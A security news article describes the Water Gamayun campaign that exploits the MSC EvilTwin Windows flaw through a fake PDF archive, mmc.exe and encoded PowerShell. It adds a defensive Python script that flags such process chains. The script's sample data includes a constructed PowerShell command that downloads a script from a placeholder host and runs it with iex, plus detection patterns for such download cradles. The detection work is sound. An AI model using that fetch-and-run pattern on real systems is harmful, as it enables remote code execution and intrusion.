The persistent threat group Water Gamayun has intensified its cyberattacks, exploiting a newly identified Windows vulnerability, CVE-2025-26633, dubbed MSC EvilTwin. The campaign targets enterprise and government organizations, using multi-stage attacks to exfiltrate sensitive information, steal credentials, and establish long-term network access. The attacks, first observed in 2025, combine techniques such as the abuse of trusted binaries and heavy obfuscation to circumvent modern security controls.
The attack chain begins with a user’s web search that leads to a compromised website. That site redirects the victim to a look-alike domain, which delivers a malicious RAR archive posing as a PDF under the name “hiringassistant.pdf.rar.” When the archive is opened, the embedded payload exploits the MSC EvilTwin vulnerability by dropping a specially crafted .msc file, which the legitimate mmc.exe process then loads. According to Zscaler security analysts, mmc.exe is then induced to run hidden PowerShell commands through misuse of TaskPad snap-in functionality.
The campaign is distinguished by its multi-stage attack methodology and sophisticated evasion tactics designed to elude both users and automated detection tools. Zscaler researchers have attributed this campaign to Water Gamayun, citing several key indicators. These include the rare abuse of the EvilTwin vulnerability, custom PowerShell obfuscation techniques, and the deployment of decoy recruitment documents to reduce user suspicion.
Water Gamayun Exploits MSC EvilTwin Vulnerability for Malicious Code Injection
The detailed analysis by the Zscaler research team reveals the intricate workings of the Water Gamayun attack. Once an initial foothold is established, the malware chain orchestrates a series of actions, including the download of executables, extraction of archives, and process injection, all aimed at expanding its reach within the targeted network. This coordinated effort highlights the evolving sophistication of advanced persistent threats (APTs).
Multi-Stage Payload and Hidden Execution
At the core of Water Gamayun’s operational strategy lies a meticulously layered infection process. Following the user’s interaction with the disguised RAR file, the payload proceeds to write a malicious .msc file onto the disk. When this file is executed, the mmc.exe utility interprets the embedded malicious snap-in data. This interpretation leads to the execution of encoded PowerShell commands.
The first-stage PowerShell script downloads legitimate utilities such as UnRAR.exe, which it then uses to unpack password-protected archives holding further payloads. These scripts run as encoded commands, for example “-EncodedCommand JABX… | iex,” where the Base64 argument decodes to the actual script and the result is piped to Invoke-Expression, hiding the script’s purpose from casual inspection.
A second-stage script then compiles a .NET module that hides the malware’s windows from the user. It also opens a decoy PDF to further mislead the victim and deploys the final loader executable, ItunesC.exe, which is designed to maintain long-term persistence on the compromised system by launching multiple instances of itself and concealing its network beacons to external IP addresses.
This campaign underscores how effective layered obfuscation and multi-phase execution are at evading current defenses. Defenders should therefore monitor for unusual file extensions, widespread use of encoded PowerShell, suspicious process execution chains, and anomalous network activity pointing to similar infrastructure. The ability of actors like Water Gamayun to leverage lesser-known vulnerabilities such as MSC EvilTwin calls for continuous adaptation of defensive strategies.
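As an added example that is not part of the original article or Zscaler’s research, the following Python script applies the monitoring advice above to constructed process-creation events: it flags the double-extension archive name, powershell.exe spawned by mmc.exe, and -EncodedCommand arguments whose decoded script contains a download cradle or iex. The event format, file paths and URL are assumptions.

```python
import base64
import re

def encode_ps(script):
    """-EncodedCommand takes the script as Base64 of its UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events modelled on the chain above; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "WinRAR.exe",
     "cmdline": r"WinRAR.exe C:\Users\u\Downloads\hiringassistant.pdf.rar"},
    {"parent": "mmc.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(
         "$W=(New-Object Net.WebClient).DownloadString('http://example.invalid/a'); $W | iex")},
    {"parent": "explorer.exe", "image": "powershell.exe",   # benign admin script
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"\biex\b|invoke-expression|downloadstring|net\.webclient", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(ev):
    """Return every detection reason that fires for one event (empty list if clean)."""
    reasons, image, parent = [], ev["image"].lower(), ev["parent"].lower()
    if re.search(r"\.pdf\.rar\b", ev["cmdline"], re.I):
        reasons.append("double-extension archive (.pdf.rar)")
    if image == "powershell.exe":
        if parent == "mmc.exe":
            reasons.append("powershell.exe spawned by mmc.exe")
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            reasons.append("encoded PowerShell command")
            if CRADLE.search(decoded):
                reasons.append("download cradle / iex in decoded command")
    return reasons

def scan(events):
    """Map event index -> reasons for every event that triggered at least one rule."""
    return {i: r for i, r in ((i, classify_event(e)) for i, e in enumerate(events)) if r}
```

Because UTF-16LE text starting with "$W" Base64-encodes to the prefix "JABX", the sample’s encoded argument begins exactly like the "JABX…" fragment quoted above.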
Looking ahead, organizations must anticipate that Water Gamayun and similar APT groups will continue to refine their tactics, potentially discovering and exploiting new vulnerabilities. The ongoing analysis of their methodology, including the specific indicators of compromise identified by Zscaler, will be crucial for developing robust and proactive defenses. The cybersecurity community will be watching closely for any further evolution in their attack vectors and the implementation of countermeasures by affected entities.